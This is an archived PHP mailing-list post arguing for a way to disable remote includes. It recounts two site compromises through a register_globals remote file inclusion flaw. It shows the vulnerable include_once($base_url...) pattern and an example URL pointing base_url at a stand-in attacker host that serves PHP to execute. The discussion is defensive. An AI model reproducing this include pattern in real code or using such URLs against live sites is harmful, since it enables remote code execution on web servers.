Re: allow_url_fopen ini directive not enough

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



OK, apologies on my part, I did not correctly explian the problem which can and has arisen from remote includes.

I'll try to explain the problem that I have come across twice in the last couple of years both with popular software packages that I downloaded like thousands of others and both with exactly the same vunerability and both resulted in my site being comprimised and having to resort to backups.

The vunerability occurred where both applications had a variable setting a base directory of the source code, which was used when including files throughout the application, i.e.:

$base_url = '/home/example.com/www';
include_once ($base_url.'/config.php');

In config.php you would then have, for example:

<?php
include_once ($base_url.'/whatever.php');
...
?>

Now in each instance register globals was on and all that was needed to comprimise the site was to have a variable passed in the url to set the base url to a remote site, which in turn output php to execute, i.e.:

http://example.com/config.php?base_url=http://myhacksite.example.com

Now, you are correct that education on how to avoid this kind of issue is key, however that does not avoid the problem. Turning of register globals would prevent many of these attacks, however there are still many apps out there that require register globals to be on and there are other ways to use this exploit with them off.

Now all I'm saying is that given the potential for damage and , from my point of view, the little improvement that this feature actually provides, why would you NOT have a way of disabling it. I would if I could, and I know of others who would as well.

Any thoughts?

KJ

PS: If you gave someone that you didn't trust access to your scripts then you're asking for trouble, that was not my point and was not part of any kind of thinking towards this request.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux